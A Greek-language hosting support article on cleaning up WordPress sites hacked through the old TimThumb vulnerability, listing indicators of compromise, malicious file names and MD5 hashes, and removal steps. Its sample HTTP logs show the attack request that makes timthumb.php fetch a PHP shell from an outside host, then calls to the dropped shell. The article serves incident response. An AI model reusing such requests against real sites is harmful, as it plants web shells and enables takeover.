Παραβίαση του WordPress: TimThumb

Το TimThumb είναι ένα εργαλείο που χρησιμοποιείται από θέματα και προσθήκες του WordPress για την προσαρμογή μεγέθους εικόνων. Οι παλαιότερες εκδόσεις του TimThumb διαθέτουν μια ευπάθεια ασφάλειας, η οποία επιτρέπει στους εισβολείς να κάνουν αποστολή κακόβουλων αρχείων από έναν άλλο ιστότοπο. Το πρώτο κακόβουλο αρχείο επιτρέπει στον εισβολέα να κάνει αποστολή περισσότερων κακόβουλων αρχείων στον λογαριασμό φιλοξενίας.

Για περισσότερες πληροφορίες σχετικά με τις παραβιάσεις και τον τρόπο με τον οποίο μπορείτε να τις αντιμετωπίσετε, ανατρέξτε στο άρθρο Τι συμβαίνει αν ο ιστότοπός μου παραβιαστεί;.

Ενδείξεις παραβίασης

Εκτός από τις ενδείξεις που αναφέρονται στο άρθρο Τι συμβαίνει αν ο ιστότοπός μου παραβιαστεί;, μπορείτε να καταλάβετε ότι ο ιστότοπός σας έχει επηρεαστεί από αυτήν την συγκεκριμένη παραβίαση, αν ο λογαριασμός σας περιέχει αρχεία με τα ακόλουθα μοτίβα σε έναν κατάλογο προσθηκών:

  • external_[md5 hash].php — για παράδειγμα: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — για παράδειγμα: 7eebe45bde5168488ac4010f0d65cea8.php

Μπορείτε να βρείτε παραδείγματα πιθανών κατακερματισμών md5 στην ενότητα Αθροίσματα MD5 γνωστών κακόβουλων αρχείων αυτού του άρθρου.

Επίσης, ενδέχεται να βρείτε τα ακόλουθα αρχεία στον ριζικό κατάλογο του ιστότοπού σας (περισσότερες πληροφορίες):

  • x.txt
  • logx.txt

Επιδιορθώσεις

Πρέπει να καταργήσετε όλα αυτά τα παραβιασμένα και κακόβουλα αρχεία. Πριν διαγράψετε οτιδήποτε, συνιστούμε να δημιουργήσετε ένα αντίγραφο ασφαλείας του ιστότοπού σας (περισσότερες πληροφορίες).

Εντοπισμός κακόβουλων αρχείων

Τα κακόβουλα αρχεία που αποστέλλονται αρχικά μέσω της ευπάθειας TimThumb συνήθως βρίσκονται σε έναν από τους ακόλουθους καταλόγους, οι οποίοι βρίσκονται στον κατάλογο /theme ή /plugin που περιέχει το ευπαθές αρχείο TimThumb.

  • /tmp
  • /cache
  • /images

Παραδείγματα θέσεων κακόβουλων αρχείων:

[webroot]/wp-content/themes/[θέμα με ευπαθές TimThumb]/cache/images/

Παραδείγματα ονομάτων κακόβουλων αρχείων σε αυτές τις θέσεις:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Τα αρχεία x.txt και logx.txt θα περιέχουν πληροφορίες σχετικά με την ημερομηνία δημιουργίας ενός κακόβουλου αρχείου χρησιμοποιώντας την ευπάθεια TimThumb και τη θέση του κακόβουλου αρχείου εντός του λογαριασμού φιλοξενίας. Αυτές οι πληροφορίες μπορούν να σας βοηθήσουν να προσδιορίσετε τα αρχεία που πρέπει να καταργήσετε και τη θέση στην οποία βρίσκονται. Ωστόσο, αυτές οι πληροφορίες μάλλον δεν θα παρέχουν μια πλήρη λίστα των αρχείων που πρέπει να καταργηθούν.

Ένα παράδειγμα:

Ημέρα: Πέμ, 11 Απρ 2013 06:21:15 -0700
Διεύθυνση IP: X.X.X.X
Πρόγραμμα περιήγησης: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[θέμα με ευπαθές TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Αρχεία για κατάργηση

Όταν δημιουργήσετε ένα αντίγραφο ασφαλείας του ιστότοπού σας, καταργήστε τα ακόλουθα αρχεία:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — για παράδειγμα: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — για παράδειγμα: 7eebe45bde5168488ac4010f0d65cea8.php
  • Άλλα κακόβουλα αρχεία PHP που εντοπίστηκαν με αρχεία τα ονόματα των οποίων περιέχουν τον κατακερματισμό md5.

Μπορείτε να το κάνετε αυτό μέσω FTP (περισσότερες πληροφορίες) ή μέσω του προγράμματος διαχείρισης αρχείων στον πίνακα ελέγχου για τον λογαριασμό φιλοξενίας σας (περισσότερες πληροφορίες).

Επίσης, θα πρέπει να:

  • Ενημερώσετε όλα τα θέματα και τις προσθήκες στην τελευταία έκδοση.
  • Αντικαταστήσετε τυχόν στιγμιότυπα του TimThumb.php με την πιο πρόσφατη έκδοση, η οποία είναι διαθέσιμη εδώ.

Τεχνικές πληροφορίες

Δείγμα αρχείων καταγραφής HTTP

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

Αθροίσματα MD5 γνωστών κακόβουλων αρχείων

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Επιπλέον κακόβουλα αρχεία

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Ήταν χρήσιμο αυτό το άρθρο;
Σας ευχαριστούμε για τα σχόλια. Για να μιλήσετε με έναν εκπρόσωπο της εξυπηρέτησης πελατών, χρησιμοποιήστε τον αριθμό τηλεφώνου υποστήριξης ή την παραπάνω επιλογή συνομιλίας.
Χαιρόμαστε που βοηθήσαμε! Υπάρχει κάτι άλλο που μπορούμε να κάνουμε για εσάς;
Λυπούμαστε. Πείτε μας τι σας μπέρδεψε ή γιατί η λύση δεν ήταν αποτελεσματική για το πρόβλημά σας.